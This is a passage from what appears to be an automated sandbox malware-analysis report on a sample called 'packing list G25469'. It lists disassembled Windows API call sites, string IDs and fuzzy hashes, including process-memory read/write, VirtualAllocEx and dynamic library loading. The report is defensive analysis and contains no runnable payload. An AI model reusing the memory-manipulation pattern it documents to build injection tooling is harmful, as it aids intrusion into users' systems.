                                                    • Part of subcall function 00B3936C: __itow.LIBCMT ref: 00B393DF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                  • String ID: .lnk
                                                  • API String ID: 2126378814-24824748
                                                  • Opcode ID: 77ab6ddce86a3e7e4b6882a1b7941826a93d0df5c8396224460f3e7573e87c75
                                                  • Instruction ID: 0fd9adcae6d22e3b36977ffd1d29b79bdadb3136b666f83b7d5ce7ef0c26356a
                                                  • Opcode Fuzzy Hash: 77ab6ddce86a3e7e4b6882a1b7941826a93d0df5c8396224460f3e7573e87c75
                                                  • Instruction Fuzzy Hash: 38A13675604301AFCB14DF14C884D6ABBE5FF89710F148998F9AA9B3A1CB31ED45CB91
                                                  APIs
                                                  • __startOneArgErrorHandling.LIBCMT ref: 00B532ED
                                                    • Part of subcall function 00B5E0D0: __87except.LIBCMT ref: 00B5E10B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ErrorHandling__87except__start
                                                  • String ID: pow
                                                  • API String ID: 2905807303-2276729525
                                                  • Opcode ID: 1a70fe708e73358dbbad3482a65ef0ed675ec34622dddc16500c4710bfde81de
                                                  • Instruction ID: 23ebf4ecc7f2d9e8540a32a171d319f3f8ae097d3c19a04083c6fd576e5fca1e
                                                  • Opcode Fuzzy Hash: 1a70fe708e73358dbbad3482a65ef0ed675ec34622dddc16500c4710bfde81de
                                                  • Instruction Fuzzy Hash: 91516C31A0860196DB197714C94137A2BD4DB40B93F208DE8FCE5863E9DF76CF9C9A49
                                                  APIs
                                                  • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00BCDC50,?,0000000F,0000000C,00000016,00BCDC50,?), ref: 00B74645
                                                    • Part of subcall function 00B3936C: __swprintf.LIBCMT ref: 00B393AB
                                                    • Part of subcall function 00B3936C: __itow.LIBCMT ref: 00B393DF
                                                  • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00B746C5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpper$__itow__swprintf
                                                  • String ID: REMOVE$THIS
                                                  • API String ID: 3797816924-776492005
                                                  • Opcode ID: bff7a40218cb90f1a202223132fbcdd47717280603efdb2871f7ed1901ff7519
                                                  • Instruction ID: 47dcb6e80bdf961477b2ca3b53aaba2ef7c8da267000ecfc9bb0616ed4c5955c
                                                  • Opcode Fuzzy Hash: bff7a40218cb90f1a202223132fbcdd47717280603efdb2871f7ed1901ff7519
                                                  • Instruction Fuzzy Hash: 51418034A002099FCF04DFA4C881AADB7F5FF49305F14C4A9E92AAB292DB34DD45CB50
                                                  APIs
                                                    • Part of subcall function 00B7430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B6BC08,?,?,00000034,00000800,?,00000034), ref: 00B74335
                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00B6C1D3
                                                    • Part of subcall function 00B742D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B6BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00B74300
                                                    • Part of subcall function 00B7422F: GetWindowThreadProcessId.USER32(?,?), ref: 00B7425A
                                                    • Part of subcall function 00B7422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00B6BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00B7426A
                                                    • Part of subcall function 00B7422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00B6BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00B74280
                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B6C240
                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B6C28D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                  • String ID: @
                                                  • API String ID: 4150878124-2766056989
                                                  • Opcode ID: f86936f0a8651ac4adb4b9fd9a45533b0dbaf3e34a82a0359ad4f80efb760111
                                                  • Instruction ID: 8a65f061d13c9ba8b1d5795db30a0e23916af627e21d5c54b64f2212092e798d
                                                  • Opcode Fuzzy Hash: f86936f0a8651ac4adb4b9fd9a45533b0dbaf3e34a82a0359ad4f80efb760111
                                                  • Instruction Fuzzy Hash: 25414D72900218AFDB10DFA4CC91AEEBBB8FF09700F108095FA59B7181DB756E45CB61
                                                  APIs
                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00BCDC00,00000000,?,?,?,?), ref: 00B9A6D8
                                                  • GetWindowLongW.USER32 ref: 00B9A6F5
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B9A705
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Window$Long
                                                  • String ID: SysTreeView32
                                                  • API String ID: 847901565-1698111956
                                                  • Opcode ID: 2c9bb52251d0bc497e2a7df0dd41e90b1a9eb1ce7b67e48d46bb27e382ffb75a
                                                  • Instruction ID: f8ec1ff2594a5a8635470df0e7adc642f77cd266b2d6e4df9978ec18234816f8
                                                  • Opcode Fuzzy Hash: 2c9bb52251d0bc497e2a7df0dd41e90b1a9eb1ce7b67e48d46bb27e382ffb75a
                                                  • Instruction Fuzzy Hash: CC319E3120020AABDF118F78CC45BEA7BE9EB49324F254769F975932E0DB74EC509B91
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00B9A15E
                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00B9A172
                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B9A196
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window
                                                  • String ID: SysMonthCal32
                                                  • API String ID: 2326795674-1439706946
                                                  • Opcode ID: ea908260f692852f78147328467237760589df53ffc74b2e395dfd54c408792a
                                                  • Instruction ID: a8ddab25f69762fafc424627af8b9e9dd405d6a36ede629e063a39b861494371
                                                  • Opcode Fuzzy Hash: ea908260f692852f78147328467237760589df53ffc74b2e395dfd54c408792a
                                                  • Instruction Fuzzy Hash: DC219F32510228ABDF118FA4CC82FEA3BB9EF49714F110264FE55BB1D0DAB5AC51CB90
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00B9A941
                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00B9A94F
                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B9A956
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$DestroyWindow
                                                  • String ID: msctls_updown32
                                                  • API String ID: 4014797782-2298589950
                                                  • Opcode ID: e12a6fa4df811c44bdd00b9684da9b38ad17481ae4799d4feb104d62dd112fc4
                                                  • Instruction ID: 86a3b42caa26c257ef0dd63fa73741dad7eb0c8df209ac704cc9071a282030f0
                                                  • Opcode Fuzzy Hash: e12a6fa4df811c44bdd00b9684da9b38ad17481ae4799d4feb104d62dd112fc4
                                                  • Instruction Fuzzy Hash: AF218CB5600209AFDB10DF28CCC1D7737EDEB5A3A4B0505A9FA049B2A1CB30EC11CAA1
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00B99A30
                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00B99A40
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00B99A65
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$MoveWindow
                                                  • String ID: Listbox
                                                  • API String ID: 3315199576-2633736733
                                                  • Opcode ID: bd39d2a9a9dc410e7d5c0b5d23b03f46813efab6847b618e9aa38fd7fa3c4278
                                                  • Instruction ID: ce1fd6ff379b6f3a57cdc2d47da24387867faa2c2fa6fde774d4a4b224560b41
                                                  • Opcode Fuzzy Hash: bd39d2a9a9dc410e7d5c0b5d23b03f46813efab6847b618e9aa38fd7fa3c4278
                                                  • Instruction Fuzzy Hash: E721B032610118BFDF218F58CC85EBB3BAAEB89760F018168F9549B1A0CA719C5187A0
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00B9A46D
                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00B9A482
                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00B9A48F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: msctls_trackbar32
                                                  • API String ID: 3850602802-1010561917
                                                  • Opcode ID: 162e348be13b386765657ba6cc3bf0bbbe2248e7653debc373770457fb7cb8f4
                                                  • Instruction ID: 71084e70229d6997c5bb8125018e0526c19cfb137f1755ce1f6c8677110ebdbd
                                                  • Opcode Fuzzy Hash: 162e348be13b386765657ba6cc3bf0bbbe2248e7653debc373770457fb7cb8f4
                                                  • Instruction Fuzzy Hash: 96110A71200208BEEF205F75CC45FAB3BA9EF88754F014128FA45A6291D7B2E811D760
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00B52350,?), ref: 00B522A1
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00B522A8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: RoInitialize$combase.dll
                                                  • API String ID: 2574300362-340411864
                                                  • Opcode ID: 1afd94b698d706007cf1601d76ccffb6fe12e127c0a18cd4e4dc4ae9636a0946
                                                  • Instruction ID: 43d55f34ccec216cae3b98c923d57281ba0c82fa6c12d67dd1343d0e39aaac25
                                                  • Opcode Fuzzy Hash: 1afd94b698d706007cf1601d76ccffb6fe12e127c0a18cd4e4dc4ae9636a0946
                                                  • Instruction Fuzzy Hash: 1BE01A746A0302ABDB106F70EC89B6436A9A701702F5044A4B202F70B1EFFA5554CF04
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00B52276), ref: 00B52376
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00B5237D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: RoUninitialize$combase.dll
                                                  • API String ID: 2574300362-2819208100
                                                  • Opcode ID: 8646dbe3bf573ce19338fece12f1d2d98208d16829e2c248f215a7fa7fa0c9b4
                                                  • Instruction ID: c7816724ca5a0afd10775b86fe1316b08e1c711ac94a733189a43f96ad7d2e34
                                                  • Opcode Fuzzy Hash: 8646dbe3bf573ce19338fece12f1d2d98208d16829e2c248f215a7fa7fa0c9b4
                                                  • Instruction Fuzzy Hash: 55E0B674555300AFDB206F60ED4DB243AA9B702702F1108A4F50AF70B1DFFC9614CA14
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: LocalTime__swprintf
                                                  • String ID: %.3d$WIN_XPe
                                                  • API String ID: 2070861257-2409531811
                                                  • Opcode ID: ffd0a0ad75fd44f73b5b571f71b9c43e0eb7453cc795cace16fcbddd077fe437
                                                  • Instruction ID: 2cb43ca95663abcea58c5fcde9d28f1929de8556f3900ebc5f8a50685aff5544
                                                  • Opcode Fuzzy Hash: ffd0a0ad75fd44f73b5b571f71b9c43e0eb7453cc795cace16fcbddd077fe437
                                                  • Instruction Fuzzy Hash: A5E012B1808658EBDB109B50CD85EF9B3FCE709751F1004D2B906E2110F7359B84EA32
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00B342EC,?,00B342AA,?), ref: 00B34304
                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B34316
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                  • API String ID: 2574300362-1355242751
                                                  • Opcode ID: b6176e10b1ff0bc5b62023e045d330b0289593b487d5a5035d1fa8474e5c18d3
                                                  • Instruction ID: 1eb3a6b43093d4f6aa5c28ae0fa73f4621bdc7815ca1c85bd9fd98a08298f124
                                                  • Opcode Fuzzy Hash: b6176e10b1ff0bc5b62023e045d330b0289593b487d5a5035d1fa8474e5c18d3
                                                  • Instruction Fuzzy Hash: 78D0A7345007129FC7205F65EC0C70176D8EB05701F1044B9E442E3171EFF8D8808610
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00B921FB,?,00B923EF), ref: 00B92213
                                                  • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00B92225
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetProcessId$kernel32.dll
                                                  • API String ID: 2574300362-399901964
                                                  • Opcode ID: a68cecdd6df1cdfa5d27dade7f077a0967a4437a07c235a534d60e1719bfc855
                                                  • Instruction ID: cff882bb9e466ca9a994801160ac76cf859158d392ae3239717d623576fa8e1c
                                                  • Opcode Fuzzy Hash: a68cecdd6df1cdfa5d27dade7f077a0967a4437a07c235a534d60e1719bfc855
                                                  • Instruction Fuzzy Hash: 2FD0A734900712AFCB254F36FC0870176D8EF09300B0044B9E841F3260EFB4D8808650
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00B341BB,00B34341,?,00B3422F,?,00B341BB,?,?,?,?,00B339FE,?,00000001), ref: 00B34359
                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00B3436B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                  • API String ID: 2574300362-3689287502
                                                  • Opcode ID: 2e7326edcaacdab48cc4eacb1c9379e1ca47b80ee059323ede3d49d048e1ac3e
                                                  • Instruction ID: 07e6ec00e2b559c86c94c4ced5ccb569b7509b42f975a8a0cba25c582212aadb
                                                  • Opcode Fuzzy Hash: 2e7326edcaacdab48cc4eacb1c9379e1ca47b80ee059323ede3d49d048e1ac3e
                                                  • Instruction Fuzzy Hash: 89D0C7795447129FD7205F75EC487517AE8EB14715F1045B9E4D6E3160EFF8E8808650
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,?,00B7051D,?,00B705FE), ref: 00B70547
                                                  • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00B70559
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                  • API String ID: 2574300362-1071820185
                                                  • Opcode ID: 050a627f27376a72fda3f4f54fbd94af7ebe47015bacc5153e7f0e54684fa697
                                                  • Instruction ID: 134c736109893dc4abda88a6f4a39591d52d08697334ae1396438417b33eb1e1
                                                  • Opcode Fuzzy Hash: 050a627f27376a72fda3f4f54fbd94af7ebe47015bacc5153e7f0e54684fa697
                                                  • Instruction Fuzzy Hash: 4BD0C774564712DFD7209F65EC4974176FCEB24711B10C5AEE45BE31A0EBF4C8808A51
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00B7052F,?,00B706D7), ref: 00B70572
                                                  • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00B70584
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                  • API String ID: 2574300362-1587604923
                                                  • Opcode ID: 97a144c65bc120f6f07bb03ec856e1eaea1d7c3096006707b667dbd77bdfa4a6
